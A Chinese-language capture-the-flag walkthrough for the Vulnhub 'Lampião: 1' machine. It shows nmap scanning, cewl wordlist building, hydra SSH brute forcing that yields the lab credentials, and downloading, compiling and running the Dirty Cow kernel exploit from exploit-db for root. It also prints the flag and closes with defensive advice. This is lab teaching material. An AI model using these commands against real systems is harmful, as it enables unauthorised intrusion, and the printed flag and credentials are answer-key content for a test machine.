Vulnhub-Lampião: 1 通关指南
字数 1153 2025-08-29 08:32:24

Vulnhub-Lampião: 1 渗透测试通关教学指南

靶机概述

  • 名称: Lampião: 1
  • 难度: 简单(Easy)
  • 目标: 获取root权限并找到flag
  • 背景: 以巴西著名土匪领袖Lampião为名的渗透测试靶机

信息收集阶段

网络扫描

  1. 确定靶机IP:

    netdiscover
    
  2. 全面端口扫描:

    nmap -n -v -Pn -p- -A --reason -oN nmap.txt 192.168.11.131
    
    • -n: 禁用DNS解析
    • -v: 详细输出
    • -Pn: 跳过主机发现
    • -p-: 扫描所有端口(1-65535)
    • -A: 启用操作系统检测和版本检测
    • --reason: 显示端口状态原因
    • -oN: 输出到文件
  3. 扫描结果分析:

    • 22端口: SSH服务
    • 80端口: HTTP服务(仅显示字符画)
    • 1898端口: Drupal CMS

漏洞利用阶段

80端口分析

  • 仅显示字符画,包含"fi duma egud?"字样
  • 无其他有用信息

1898端口(Drupal)利用

  1. 初始尝试:

    • 尝试使用Drupal 7.x PHP filter模块getshell
    • 发现注册功能不可用(激活邮件无法发送)
  2. 替代方案:

    • 使用cewl工具生成字典
    cewl -w dict.txt http://192.168.11.131:1898/?q=node/1
    
    • 发现两个潜在用户名: tiago和eder
  3. SSH爆破:

    hydra -L usernames.txt -P dict.txt -t 4 ssh://192.168.11.131
    
    • -L: 指定用户名列表
    • -P: 指定密码字典
    • -t: 线程数
    • 成功获取凭证: tiago:virgulino

权限提升

  1. 系统信息收集:

    uname -a
    lsb_release -a
    
    • 内核版本: 4.4.0-31-generic
    • 系统版本: Ubuntu 14.04.5 LTS (Trusty)
  2. 漏洞检测:

    wget -q -O /tmp/linux-exploit-suggester.sh https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
    chmod +x /tmp/linux-exploit-suggester.sh
    /tmp/linux-exploit-suggester.sh
    
    • 发现Dirty Cow(CVE-2016-5195)漏洞可用
  3. 利用Dirty Cow提权:

    wget -q -O /tmp/40847.cpp https://www.exploit-db.com/download/40847.cpp
    g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
    ./dcow -s
    
    • 成功获取root权限

获取Flag

  1. 查找flag:

    cat /root/flag.txt
    
    • 显示: 9740616875908d91ddcdaa8aea3af366
  2. 验证flag:

    md5sum /var/www/html/lampiao.jpg
    
    • 确认flag为图片的MD5值
    • 图片内容为Lampião的肖像

工具与技术总结

  1. 信息收集工具:

    • netdiscover: 发现网络主机
    • nmap: 全面端口扫描
  2. 密码爆破工具:

    • cewl: 从网页生成字典
    • hydra: SSH爆破
  3. 权限提升技术:

    • 内核漏洞利用(Dirty Cow)
    • linux-exploit-suggester: 自动检测可用漏洞
  4. 关键技巧:

    • 全面端口扫描的重要性(-p-参数)
    • 从网页内容生成字典
    • 系统信息收集与漏洞匹配

防御建议

  1. 系统层面:

    • 及时更新内核和安全补丁
    • 禁用不必要的服务
  2. Drupal安全:

    • 保持CMS更新
    • 限制用户注册功能
  3. SSH安全:

    • 禁用密码认证,使用密钥认证
    • 限制登录尝试次数
    • 使用强密码策略
  4. 权限管理:

    • 遵循最小权限原则
    • 定期审计用户权限

通过本案例,我们学习了从信息收集到权限提升的完整渗透测试流程,特别是针对老旧系统的内核漏洞利用技术。

Vulnhub-Lampião: 1 渗透测试通关教学指南 靶机概述 名称 : Lampião: 1 难度 : 简单(Easy) 目标 : 获取root权限并找到flag 背景 : 以巴西著名土匪领袖Lampião为名的渗透测试靶机 信息收集阶段 网络扫描 确定靶机IP : 全面端口扫描 : -n : 禁用DNS解析 -v : 详细输出 -Pn : 跳过主机发现 -p- : 扫描所有端口(1-65535) -A : 启用操作系统检测和版本检测 --reason : 显示端口状态原因 -oN : 输出到文件 扫描结果分析 : 22端口: SSH服务 80端口: HTTP服务(仅显示字符画) 1898端口: Drupal CMS 漏洞利用阶段 80端口分析 仅显示字符画,包含"fi duma egud?"字样 无其他有用信息 1898端口(Drupal)利用 初始尝试 : 尝试使用Drupal 7.x PHP filter模块getshell 发现注册功能不可用(激活邮件无法发送) 替代方案 : 使用cewl工具生成字典 发现两个潜在用户名: tiago和eder SSH爆破 : -L : 指定用户名列表 -P : 指定密码字典 -t : 线程数 成功获取凭证: tiago:virgulino 权限提升 系统信息收集 : 内核版本: 4.4.0-31-generic 系统版本: Ubuntu 14.04.5 LTS (Trusty) 漏洞检测 : 发现Dirty Cow(CVE-2016-5195)漏洞可用 利用Dirty Cow提权 : 成功获取root权限 获取Flag 查找flag : 显示: 9740616875908d91ddcdaa8aea3af366 验证flag : 确认flag为图片的MD5值 图片内容为Lampião的肖像 工具与技术总结 信息收集工具 : netdiscover: 发现网络主机 nmap: 全面端口扫描 密码爆破工具 : cewl: 从网页生成字典 hydra: SSH爆破 权限提升技术 : 内核漏洞利用(Dirty Cow) linux-exploit-suggester: 自动检测可用漏洞 关键技巧 : 全面端口扫描的重要性(-p-参数) 从网页内容生成字典 系统信息收集与漏洞匹配 防御建议 系统层面 : 及时更新内核和安全补丁 禁用不必要的服务 Drupal安全 : 保持CMS更新 限制用户注册功能 SSH安全 : 禁用密码认证,使用密钥认证 限制登录尝试次数 使用强密码策略 权限管理 : 遵循最小权限原则 定期审计用户权限 通过本案例,我们学习了从信息收集到权限提升的完整渗透测试流程,特别是针对老旧系统的内核漏洞利用技术。